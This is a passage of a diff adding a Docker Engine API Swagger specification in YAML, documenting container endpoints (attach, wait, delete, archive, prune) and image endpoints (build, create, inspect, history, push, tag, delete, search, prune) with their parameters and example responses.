+      operationId: "ContainerUnpause"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}/attach:
+    post:
+      summary: "Attach to a container"
+      description: |
+        Attach to a container to read its output or send it input. You can attach to the same container multiple times and you can reattach to containers that have been detached.
+
+        Either the `stream` or `logs` parameter must be `true` for this endpoint to do anything.
+
+        See [the documentation for the `docker attach` command](https://docs.docker.com/engine/reference/commandline/attach/) for more details.
+
+        ### Hijacking
+
+        This endpoint hijacks the HTTP connection to transport `stdin`, `stdout`, and `stderr` on the same socket.
+
+        This is the response from the daemon for an attach request:
+
+        ```
+        HTTP/1.1 200 OK
+        Content-Type: application/vnd.docker.raw-stream
+
+        [STREAM]
+        ```
+
+        After the headers and two new lines, the TCP connection can now be used for raw, bidirectional communication between the client and server.
+
+        To hint potential proxies about connection hijacking, the Docker client can also optionally send connection upgrade headers.
+
+        For example, the client sends this request to upgrade the connection:
+
+        ```
+        POST /containers/16253994b7c4/attach?stream=1&stdout=1 HTTP/1.1
+        Upgrade: tcp
+        Connection: Upgrade
+        ```
+
+        The Docker daemon will respond with a `101 UPGRADED` response, and will similarly follow with the raw stream:
+
+        ```
+        HTTP/1.1 101 UPGRADED
+        Content-Type: application/vnd.docker.raw-stream
+        Connection: Upgrade
+        Upgrade: tcp
+
+        [STREAM]
+        ```
+
+        ### Stream format
+
+        When the TTY setting is disabled in [`POST /containers/create`](#operation/ContainerCreate), the stream over the hijacked connected is multiplexed to separate out `stdout` and `stderr`. The stream consists of a series of frames, each containing a header and a payload.
+
+        The header contains the information which the stream writes (`stdout` or `stderr`). It also contains the size of the associated frame encoded in the last four bytes (`uint32`).
+
+        It is encoded on the first eight bytes like this:
+
+        ```go
+        header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+        ```
+
+        `STREAM_TYPE` can be:
+
+        - 0: `stdin` (is written on `stdout`)
+        - 1: `stdout`
+        - 2: `stderr`
+
+        `SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of the `uint32` size encoded as big endian.
+
+        Following the header is the payload, which is the specified number of bytes of `STREAM_TYPE`.
+
+        The simplest way to implement this protocol is the following:
+
+        1. Read 8 bytes.
+        2. Choose `stdout` or `stderr` depending on the first byte.
+        3. Extract the frame size from the last four bytes.
+        4. Read the extracted size and output it on the correct output.
+        5. Goto 1.
+
+        ### Stream format when using a TTY
+
+        When the TTY setting is enabled in [`POST /containers/create`](#operation/ContainerCreate), the stream is not multiplexed. The data exchanged over the hijacked connection is simply the raw data from the process PTY and client's `stdin`.
+
+      operationId: "ContainerAttach"
+      produces:
+        - "application/vnd.docker.raw-stream"
+      responses:
+        101:
+          description: "no error, hints proxy about hijacking"
+        200:
+          description: "no error, no upgrade header found"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "detachKeys"
+          in: "query"
+          description: "Override the key sequence for detaching a container.Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`."
+          type: "string"
+        - name: "logs"
+          in: "query"
+          description: |
+            Replay previous logs from the container.
+
+            This is useful for attaching to a container that has started and you want to output everything since the container started.
+
+            If `stream` is also enabled, once all the previous output has been returned, it will seamlessly transition into streaming current output.
+          type: "boolean"
+          default: false
+        - name: "stream"
+          in: "query"
+          description: "Stream attached streams from the the time the request was made onwards"
+          type: "boolean"
+          default: false
+        - name: "stdin"
+          in: "query"
+          description: "Attach to `stdin`"
+          type: "boolean"
+          default: false
+        - name: "stdout"
+          in: "query"
+          description: "Attach to `stdout`"
+          type: "boolean"
+          default: false
+        - name: "stderr"
+          in: "query"
+          description: "Attach to `stderr`"
+          type: "boolean"
+          default: false
+      tags: ["Container"]
+  /containers/{id}/attach/ws:
+    get:
+      summary: "Attach to a container via a websocket"
+      operationId: "ContainerAttachWebsocket"
+      responses:
+        101:
+          description: "no error, hints proxy about hijacking"
+        200:
+          description: "no error, no upgrade header found"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "detachKeys"
+          in: "query"
+          description: "Override the key sequence for detaching a container.Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,`, or `_`."
+          type: "string"
+        - name: "logs"
+          in: "query"
+          description: "Return logs"
+          type: "boolean"
+          default: false
+        - name: "stream"
+          in: "query"
+          description: "Return stream"
+          type: "boolean"
+          default: false
+        - name: "stdin"
+          in: "query"
+          description: "Attach to `stdin`"
+          type: "boolean"
+          default: false
+        - name: "stdout"
+          in: "query"
+          description: "Attach to `stdout`"
+          type: "boolean"
+          default: false
+        - name: "stderr"
+          in: "query"
+          description: "Attach to `stderr`"
+          type: "boolean"
+          default: false
+      tags: ["Container"]
+  /containers/{id}/wait:
+    post:
+      summary: "Wait for a container"
+      description: "Block until a container stops, then returns the exit code."
+      operationId: "ContainerWait"
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "The container has exit."
+          schema:
+            type: "object"
+            required: [StatusCode]
+            properties:
+              StatusCode:
+                description: "Exit code of the container"
+                type: "integer"
+                x-nullable: false
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}:
+    delete:
+      summary: "Remove a container"
+      operationId: "ContainerDelete"
+      responses:
+        204:
+          description: "no error"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "v"
+          in: "query"
+          description: "Remove the volumes associated with the container."
+          type: "boolean"
+          default: false
+        - name: "force"
+          in: "query"
+          description: "If the container is running, kill it before removing it."
+          type: "boolean"
+          default: false
+      tags: ["Container"]
+  /containers/{id}/archive:
+    head:
+      summary: "Get information about files in a container"
+      description: "A response header `X-Docker-Container-Path-Stat` is return containing a base64 - encoded JSON object with some filesystem header information about the path."
+      operationId: "ContainerArchiveHead"
+      responses:
+        200:
+          description: "no error"
+          headers:
+            X-Docker-Container-Path-Stat:
+              type: "string"
+              description: "TODO"
+        400:
+          description: "Bad parameter"
+          schema:
+            allOf:
+              - $ref: "#/definitions/ErrorResponse"
+              - type: "object"
+                properties:
+                  message:
+                    description: "The error message. Either \"must specify path parameter\" (path cannot be empty) or \"not a directory\" (path was asserted to be a directory but exists as a file)."
+                    type: "string"
+                    x-nullable: false
+        404:
+          description: "Container or path does not exist"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "path"
+          in: "query"
+          required: true
+          description: "Resource in the container’s filesystem to archive."
+          type: "string"
+      tags: ["Container"]
+    get:
+      summary: "Get an archive of a filesystem resource in a container"
+      description: "Get an tar archive of a resource in the filesystem of container id."
+      operationId: "ContainerGetArchive"
+      produces:
+        - "application/x-tar"
+      responses:
+        200:
+          description: "no error"
+        400:
+          description: "Bad parameter"
+          schema:
+            allOf:
+              - $ref: "#/definitions/ErrorResponse"
+              - type: "object"
+                properties:
+                  message:
+                    description: "The error message. Either \"must specify path parameter\" (path cannot be empty) or \"not a directory\" (path was asserted to be a directory but exists as a file)."
+                    type: "string"
+                    x-nullable: false
+        404:
+          description: "Container or path does not exist"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "path"
+          in: "query"
+          required: true
+          description: "Resource in the container’s filesystem to archive."
+          type: "string"
+      tags: ["Container"]
+    put:
+      summary: "Extract an archive of files or folders to a directory in a container"
+      description: "Upload a tar archive to be extracted to a path in the filesystem of container id."
+      operationId: "ContainerPutArchive"
+      consumes:
+        - "application/x-tar"
+        - "application/octet-stream"
+      responses:
+        200:
+          description: "The content was extracted successfully"
+        400:
+          description: "Bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        403:
+          description: "Permission denied, the volume or container rootfs is marked as read-only."
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "No such container or path does not exist inside the container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "path"
+          in: "query"
+          required: true
+          description: "Path to a directory in the container to extract the archive’s contents into. "
+          type: "string"
+        - name: "noOverwriteDirNonDir"
+          in: "query"
+          description: "If “1”, “true”, or “True” then it will be an error if unpacking the given content would cause an existing directory to be replaced with a non-directory and vice versa."
+          type: "string"
+        - name: "inputStream"
+          in: "body"
+          required: true
+          description: "The input stream must be a tar archive compressed with one of the following algorithms: identity (no compression), gzip, bzip2, xz."
+          schema:
+            type: "string"
+      tags: ["Container"]
+  /containers/prune:
+    post:
+      summary: "Delete stopped containers"
+      produces:
+        - "application/json"
+      operationId: "ContainerPrune"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
+
+            Available filters:
+          type: "string"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              ContainersDeleted:
+                description: "Container IDs that were deleted"
+                type: "array"
+                items:
+                  type: "string"
+              SpaceReclaimed:
+                description: "Disk space reclaimed in bytes"
+                type: "integer"
+                format: "int64"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Container"]
+  /images/json:
+    get:
+      summary: "List Images"
+      description: "Returns a list of images on the server. Note that it uses a different, smaller representation of an image than inspecting a single image."
+      operationId: "ImageList"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "Summary image data for the images matching the query"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/ImageSummary"
+          examples:
+            application/json:
+              - Id: "sha256:e216a057b1cb1efc11f8a268f37ef62083e70b1b38323ba252e25ac88904a7e8"
+                ParentId: ""
+                RepoTags:
+                  - "ubuntu:12.04"
+                  - "ubuntu:precise"
+                RepoDigests:
+                  - "ubuntu@sha256:992069aee4016783df6345315302fa59681aae51a8eeb2f889dea59290f21787"
+                Created: 1474925151
+                Size: 103579269
+                VirtualSize: 103579269
+                SharedSize: 0
+                Labels: {}
+                Containers: 2
+              - Id: "sha256:3e314f95dcace0f5e4fd37b10862fe8398e3c60ed36600bc0ca5fda78b087175"
+                ParentId: ""
+                RepoTags:
+                  - "ubuntu:12.10"
+                  - "ubuntu:quantal"
+                RepoDigests:
+                  - "ubuntu@sha256:002fba3e3255af10be97ea26e476692a7ebed0bb074a9ab960b2e7a1526b15d7"
+                  - "ubuntu@sha256:68ea0200f0b90df725d99d823905b04cf844f6039ef60c60bf3e019915017bd3"
+                Created: 1403128455
+                Size: 172064416
+                VirtualSize: 172064416
+                SharedSize: 0
+                Labels: {}
+                Containers: 5
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "all"
+          in: "query"
+          description: "Show all images. Only images from a final layer (no children) are shown by default."
+          type: "boolean"
+          default: false
+        - name: "filters"
+          in: "query"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the images list.
+
+            Available filters:
+            - `dangling=true`
+            - `label=key` or `label="key=value"` of an image label
+            - `before`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
+            - `since`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
+            - `reference`=(`<image-name>[:<tag>]`)
+          type: "string"
+        - name: "digests"
+          in: "query"
+          description: "Show digest information as a `RepoDigests` field on each image."
+          type: "boolean"
+          default: false
+      tags: ["Image"]
+  /build:
+    post:
+      summary: "Build an image"
+      description: |
+        Build an image from a tar archive with a `Dockerfile` in it.
+
+        The `Dockerfile` specifies how the image is built from the tar archive. It is typically in the archive's root, but can be at a different path or have a different name by specifying the `dockerfile` parameter. [See the `Dockerfile` reference for more information](https://docs.docker.com/engine/reference/builder/).
+
+        The Docker daemon performs a preliminary validation of the `Dockerfile` before starting the build, and returns an error if the syntax is incorrect. After that, each instruction is run one-by-one until the ID of the new image is output.
+
+        The build is canceled if the client drops the connection by quitting or being killed.
+      operationId: "ImageBuild"
+      consumes:
+        - "application/octet-stream"
+      produces:
+        - "application/json"
+      parameters:
+        - name: "inputStream"
+          in: "body"
+          description: "A tar archive compressed with one of the following algorithms: identity (no compression), gzip, bzip2, xz."
+          schema:
+            type: "string"
+            format: "binary"
+        - name: "dockerfile"
+          in: "query"
+          description: "Path within the build context to the `Dockerfile`. This is ignored if `remote` is specified and points to an external `Dockerfile`."
+          type: "string"
+          default: "Dockerfile"
+        - name: "t"
+          in: "query"
+          description: "A name and optional tag to apply to the image in the `name:tag` format. If you omit the tag the default `latest` value is assumed. You can provide several `t` parameters."
+          type: "string"
+        - name: "remote"
+          in: "query"
+          description: "A Git repository URI or HTTP/HTTPS context URI. If the URI points to a single text file, the file’s contents are placed into a file called `Dockerfile` and the image is built from that file. If the URI points to a tarball, the file is downloaded by the daemon and the contents therein used as the context for the build. If the URI points to a tarball and the `dockerfile` parameter is also specified, there must be a file with the corresponding path inside the tarball."
+          type: "string"
+        - name: "q"
+          in: "query"
+          description: "Suppress verbose build output."
+          type: "boolean"
+          default: false
+        - name: "nocache"
+          in: "query"
+          description: "Do not use the cache when building the image."
+          type: "boolean"
+          default: false
+        - name: "cachefrom"
+          in: "query"
+          description: "JSON array of images used for build cache resolution."
+          type: "string"
+        - name: "pull"
+          in: "query"
+          description: "Attempt to pull the image even if an older image exists locally."
+          type: "string"
+        - name: "rm"
+          in: "query"
+          description: "Remove intermediate containers after a successful build."
+          type: "boolean"
+          default: true
+        - name: "forcerm"
+          in: "query"
+          description: "Always remove intermediate containers, even upon failure."
+          type: "boolean"
+          default: false
+        - name: "memory"
+          in: "query"
+          description: "Set memory limit for build."
+          type: "integer"
+        - name: "memswap"
+          in: "query"
+          description: "Total memory (memory + swap). Set as `-1` to disable swap."
+          type: "integer"
+        - name: "cpushares"
+          in: "query"
+          description: "CPU shares (relative weight)."
+          type: "integer"
+        - name: "cpusetcpus"
+          in: "query"
+          description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)."
+          type: "string"
+        - name: "cpuperiod"
+          in: "query"
+          description: "The length of a CPU period in microseconds."
+          type: "integer"
+        - name: "cpuquota"
+          in: "query"
+          description: "Microseconds of CPU time that the container can get in a CPU period."
+          type: "integer"
+        - name: "buildargs"
+          in: "query"
+          description: "JSON map of string pairs for build-time variables. Users pass these values at build-time. Docker uses the buildargs as the environment context for commands run via the `Dockerfile` RUN instruction, or for variable expansion in other `Dockerfile` instructions. This is not meant for passing secret values. [Read more about the buildargs instruction.](https://docs.docker.com/engine/reference/builder/#arg)"
+          type: "integer"
+        - name: "shmsize"
+          in: "query"
+          description: "Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB."
+          type: "integer"
+        - name: "squash"
+          in: "query"
+          description: "Squash the resulting images layers into a single layer. *(Experimental release only.)*"
+          type: "boolean"
+        - name: "labels"
+          in: "query"
+          description: "Arbitrary key/value labels to set on the image, as a JSON map of string pairs."
+          type: "string"
+        - name: "networkmode"
+          in: "query"
+          description: "Sets the networking mode for the run commands during
+        build. Supported standard values are: `bridge`, `host`, `none`, and
+        `container:<name|id>`. Any other value is taken as a custom network's
+        name to which this container should connect to."
+          type: "string"
+        - name: "Content-type"
+          in: "header"
+          type: "string"
+          enum:
+            - "application/tar"
+          default: "application/tar"
+        - name: "X-Registry-Config"
+          in: "header"
+          description: |
+            This is a base64-encoded JSON object with auth configurations for multiple registries that a build may refer to.
+
+            The key is a registry URL, and the value is an auth configuration object, [as described in the authentication section](#section/Authentication). For example:
+
+            ```
+            {
+              "docker.example.com": {
+                "username": "janedoe",
+                "password": "hunter2"
+              },
+              "https://index.docker.io/v1/": {
+                "username": "mobydock",
+                "password": "conta1n3rize14"
+              }
+            }
+            ```
+
+            Only the registry domain name (and port if not the default 443) are required. However, for legacy reasons, the Docker Hub registry must be specified with both a `https://` prefix and a `/v1/` suffix even though Docker will prefer to use the v2 registry API.
+          type: "string"
+      responses:
+        200:
+          description: "no error"
+        400:
+          description: "Bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Image"]
+  /images/create:
+    post:
+      summary: "Create an image"
+      description: "Create an image by either pulling it from a registry or importing it."
+      operationId: "ImageCreate"
+      consumes:
+        - "text/plain"
+        - "application/octet-stream"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "repository does not exist or no read access"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "fromImage"
+          in: "query"
+          description: "Name of the image to pull. The name may include a tag or digest. This parameter may only be used when pulling an image. The pull is cancelled if the HTTP connection is closed."
+          type: "string"
+        - name: "fromSrc"
+          in: "query"
+          description: "Source to import. The value may be a URL from which the image can be retrieved or `-` to read the image from the request body. This parameter may only be used when importing an image."
+          type: "string"
+        - name: "repo"
+          in: "query"
+          description: "Repository name given to an image when it is imported. The repo may include a tag. This parameter may only be used when importing an image."
+          type: "string"
+        - name: "tag"
+          in: "query"
+          description: "Tag or digest. If empty when pulling an image, this causes all tags for the given image to be pulled."
+          type: "string"
+        - name: "inputImage"
+          in: "body"
+          description: "Image content if the value `-` has been specified in fromSrc query parameter"
+          schema:
+            type: "string"
+          required: false
+        - name: "X-Registry-Auth"
+          in: "header"
+          description: "A base64-encoded auth configuration. [See the authentication section for details.](#section/Authentication)"
+          type: "string"
+      tags: ["Image"]
+  /images/{name}/json:
+    get:
+      summary: "Inspect an image"
+      description: "Return low-level information about an image."
+      operationId: "ImageInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            $ref: "#/definitions/Image"
+          examples:
+            application/json:
+              Id: "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c"
+              Container: "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a"
+              Comment: ""
+              Os: "linux"
+              Architecture: "amd64"
+              Parent: "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c"
+              ContainerConfig:
+                Tty: false
+                Hostname: "e611e15f9c9d"
+                Domainname: ""
+                AttachStdout: false
+                PublishService: ""
+                AttachStdin: false
+                OpenStdin: false
+                StdinOnce: false
+                NetworkDisabled: false
+                OnBuild: []
+                Image: "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c"
+                User: ""
+                WorkingDir: ""
+                MacAddress: ""
+                AttachStderr: false
+                Labels:
+                  com.example.license: "GPL"
+                  com.example.version: "1.0"
+                  com.example.vendor: "Acme"
+                Env:
+                  - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+                Cmd:
+                  - "/bin/sh"
+                  - "-c"
+                  - "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0"
+              DockerVersion: "1.9.0-dev"
+              VirtualSize: 188359297
+              Size: 0
+              Author: ""
+              Created: "2015-09-10T08:30:53.26995814Z"
+              GraphDriver:
+                Name: "aufs"
+              RepoDigests:
+                - "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+              RepoTags:
+                - "example:1.0"
+                - "example:latest"
+                - "example:stable"
+              Config:
+                Image: "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c"
+                NetworkDisabled: false
+                OnBuild: []
+                StdinOnce: false
+                PublishService: ""
+                AttachStdin: false
+                OpenStdin: false
+                Domainname: ""
+                AttachStdout: false
+                Tty: false
+                Hostname: "e611e15f9c9d"
+                Cmd:
+                  - "/bin/bash"
+                Env:
+                  - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+                Labels:
+                  com.example.vendor: "Acme"
+                  com.example.version: "1.0"
+                  com.example.license: "GPL"
+                MacAddress: ""
+                AttachStderr: false
+                WorkingDir: ""
+                User: ""
+              RootFS:
+                Type: "layers"
+                Layers:
+                  - "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6"
+                  - "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
+        404:
+          description: "No such image"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such image: someimage (tag: latest)"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or id"
+          type: "string"
+          required: true
+      tags: ["Image"]
+  /images/{name}/history:
+    get:
+      summary: "Get the history of an image"
+      description: "Return parent layers of an image."
+      operationId: "ImageHistory"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                Id:
+                  type: "string"
+                Created:
+                  type: "integer"
+                  format: "int64"
+                CreatedBy:
+                  type: "string"
+                Tags:
+                  type: "array"
+                  items:
+                    type: "string"
+                Size:
+                  type: "integer"
+                  format: "int64"
+                Comment:
+                  type: "string"
+          examples:
+            application/json:
+              - Id: "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710"
+                Created: 1398108230
+                CreatedBy: "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /"
+                Tags:
+                  - "ubuntu:lucid"
+                  - "ubuntu:10.04"
+                Size: 182964289
+                Comment: ""
+              - Id: "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8"
+                Created: 1398108222
+                CreatedBy: "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/"
+                Tags: []
+                Size: 0
+                Comment: ""
+              - Id: "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"
+                Created: 1371157430
+                CreatedBy: ""
+                Tags:
+                  - "scratch12:latest"
+                  - "scratch:latest"
+                Size: 0
+                Comment: "Imported from -"
+        404:
+          description: "No such image"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or ID"
+          type: "string"
+          required: true
+      tags: ["Image"]
+  /images/{name}/push:
+    post:
+      summary: "Push an image"
+      description: |
+        Push an image to a registry.
+
+        If you wish to push an image on to a private registry, that image must already have a tag which references the registry. For example, `registry.example.com/myimage:latest`.
+
+        The push is cancelled if the HTTP connection is closed.
+      operationId: "ImagePush"
+      consumes:
+        - "application/octet-stream"
+      responses:
+        200:
+          description: "No error"
+        404:
+          description: "No such image"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or ID."
+          type: "string"
+          required: true
+        - name: "tag"
+          in: "query"
+          description: "The tag to associate with the image on the registry."
+          type: "string"
+        - name: "X-Registry-Auth"
+          in: "header"
+          description: "A base64-encoded auth configuration. [See the authentication section for details.](#section/Authentication)"
+          type: "string"
+          required: true
+      tags: ["Image"]
+  /images/{name}/tag:
+    post:
+      summary: "Tag an image"
+      description: "Tag an image so that it becomes part of a repository."
+      operationId: "ImageTag"
+      responses:
+        201:
+          description: "No error"
+        400:
+          description: "Bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "No such image"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "Conflict"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or ID to tag."
+          type: "string"
+          required: true
+        - name: "repo"
+          in: "query"
+          description: "The repository to tag in. For example, `someuser/someimage`."
+          type: "string"
+        - name: "tag"
+          in: "query"
+          description: "The name of the new tag."
+          type: "string"
+      tags: ["Image"]
+  /images/{name}:
+    delete:
+      summary: "Remove an image"
+      description: |
+        Remove an image, along with any untagged parent images that were referenced by that image.
+
+        Images can't be removed if they have descendant images, are being used by a running container or are being used by a build.
+      operationId: "ImageDelete"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/ImageDeleteResponse"
+          examples:
+            application/json:
+              - Untagged: "3e2f21a89f"
+              - Deleted: "3e2f21a89f"
+              - Deleted: "53b4f83ac9"
+        404:
+          description: "No such image"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "Conflict"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or ID"
+          type: "string"
+          required: true
+        - name: "force"
+          in: "query"
+          description: "Remove the image even if it is being used by stopped containers or has other tags"
+          type: "boolean"
+          default: false
+        - name: "noprune"
+          in: "query"
+          description: "Do not delete untagged parent images"
+          type: "boolean"
+          default: false
+      tags: ["Image"]
+  /images/search:
+    get:
+      summary: "Search images"
+      description: "Search for an image on Docker Hub."
+      operationId: "ImageSearch"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                description:
+                  type: "string"
+                is_official:
+                  type: "boolean"
+                is_automated:
+                  type: "boolean"
+                name:
+                  type: "string"
+                star_count:
+                  type: "integer"
+          examples:
+            application/json:
+              - description: ""
+                is_official: false
+                is_automated: false
+                name: "wma55/u1210sshd"
+                star_count: 0
+              - description: ""
+                is_official: false
+                is_automated: false
+                name: "jdswinbank/sshd"
+                star_count: 0
+              - description: ""
+                is_official: false
+                is_automated: false
+                name: "vgauthier/sshd"
+                star_count: 0
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "term"
+          in: "query"
+          description: "Term to search"
+          type: "string"
+          required: true
+        - name: "limit"
+          in: "query"
+          description: "Maximum number of results to return"
+          type: "integer"
+        - name: "filters"
+          in: "query"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. Available filters:
+
+            - `stars=<number>`
+            - `is-automated=(true|false)`
+            - `is-official=(true|false)`
+          type: "string"
+      tags: ["Image"]
+  /images/prune:
+    post:
+      summary: "Delete unused images"
+      produces:
+        - "application/json"
+      operationId: "ImagePrune"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
+
+            Available filters:
+            - `dangling=<boolean>` When set to `true` (or `1`), prune only
+               unused *and* untagged images. When set to `false`
+               (or `0`), all unused images are pruned.
+          type: "string"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              ImagesDeleted:
+                description: "Images that were deleted"
+                type: "array"
+                items:
+                  $ref: "#/definitions/ImageDeleteResponse"
+              SpaceReclaimed:
+                description: "Disk space reclaimed in bytes"
+                type: "integer"
+                format: "int64"
+        500:
+          description: "Server error"
+          schema:
